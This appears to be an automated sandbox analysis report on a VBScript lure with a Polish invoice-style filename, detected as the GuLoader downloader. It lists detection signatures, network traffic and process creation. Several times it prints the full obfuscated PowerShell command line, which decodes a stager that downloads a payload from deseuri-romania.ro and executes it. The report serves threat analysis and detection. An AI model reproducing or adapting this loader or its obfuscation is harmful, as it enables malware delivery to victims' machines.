Windows Analysis Report
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

Overview

General Information

Sample name:	Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
Analysis ID:	1541193
MD5:	740d51a6d22d43f1b99e61c9d3366237
SHA1:	712c28e59ff11135e1957f86d8e6a995ad772de6
SHA256:	e301c6308fff6e0e1d3e399a2ad2eb623f2f36590ff60766d16efbe6f4c154dc
Tags:	vbsuser-Maciej8910871
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Source: unknown

HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2

Source:	Binary string: stem.Core.pdbTE source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /Bennington.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: deseuri-romania.roConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Bennington.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: deseuri-romania.roConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e
Source: global traffic	DNS traffic detected: DNS query: deseuri-romania.ro

Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2D92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://deseuri-romania.ro
Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB_q
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://deseuri-romania.ro
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbP
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbXR0l
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D21BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown

HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7608.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_7852.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Java / VBScript file with very long strings (likely obfuscated code)

Source: Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6147
Source: unknown	Process created: Commandline size = 6147
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6147	Jump to behavior

Yara signature match

Source: amsi64_7608.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7852.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@9/7@2/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Ghastily.Kri

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'cracking.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7852

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
Source: C:\Windows\System32\PING.EXE	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 